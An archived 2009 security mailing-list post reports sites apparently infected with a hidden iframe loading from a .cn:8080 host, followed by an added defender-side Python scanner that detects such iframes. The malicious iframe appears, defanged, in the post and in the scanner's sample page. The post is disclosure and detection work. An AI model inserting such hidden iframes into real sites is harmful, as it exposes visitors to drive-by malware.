[nsp-sec] *.cn:8080 infected sites

Dirk Stander dst+nsp-sec at glaskugel.org
Mon Jun 8 09:05:15 EDT 2009


Hi,

Please find attached a list of sites which are most likely infected with an
<iframe src="hxxp://globalnameshop.cn:8080/index.php" width=104 height=187 style="visibility: hidden"></iframe>
style iframe.  The format of the file is:
<ASN> | <IP of infected site> | <CC> | <normalized domain> <hits> <sample URI>
The infections have been in place since at least 2009/06/06 14:17:35.

    kind regards, Dirk Stander (1&1) :.
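
A defender-side check for the iframe pattern described in the message above, as an added example that is not part of the original post: it scans a page's HTML for hidden iframes whose `src` points at a `.cn` host on port 8080. The function names and the sample page are constructed for illustration; treating `display:none` as equivalent to `visibility: hidden` goes beyond the single sample in the message, and the defanged `hxxp` scheme is accepted because only host and port are inspected.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Inline style declarations that hide an element (display:none is an added assumption).
HIDING = {("visibility", "hidden"), ("display", "none")}

# Constructed sample page; line 4 is the iframe quoted in the message (still defanged).
SAMPLE = """<html><body>
<p>Welcome</p>
<iframe src="https://maps.example.org/embed" width="400" height="300"></iframe>
<iframe src="hxxp://globalnameshop.cn:8080/index.php" width=104 height=187 style="visibility: hidden"></iframe>
<iframe src="http://video.example.com:8080/player" style="display:none"></iframe>
</body></html>"""

def _style_decls(style):
    """Split an inline style attribute into lowercase (property, value) pairs."""
    pairs = set()
    for decl in (style or "").split(";"):
        prop, sep, value = decl.partition(":")
        if sep:
            pairs.add((prop.strip().lower(), value.strip().lower()))
    return pairs

def _suspicious_src(src):
    """True when src points at a .cn host on port 8080, the pattern in the report."""
    try:
        parts = urlsplit(src or "")
        host, port = parts.hostname or "", parts.port
    except ValueError:  # malformed host or non-numeric port
        return False
    return port == 8080 and host.rstrip(".").endswith(".cn")

class IframeScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.hits = []  # (line number, src) for each matching iframe

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = dict(attrs)
        if _style_decls(a.get("style")) & HIDING and _suspicious_src(a.get("src")):
            self.hits.append((self.getpos()[0], a["src"]))

def find_injected_iframes(html):
    scanner = IframeScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.hits
```

Calling `find_injected_iframes(SAMPLE)` flags only the iframe on line 4; the visible embed and the hidden iframe on a non-`.cn` host are left alone.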


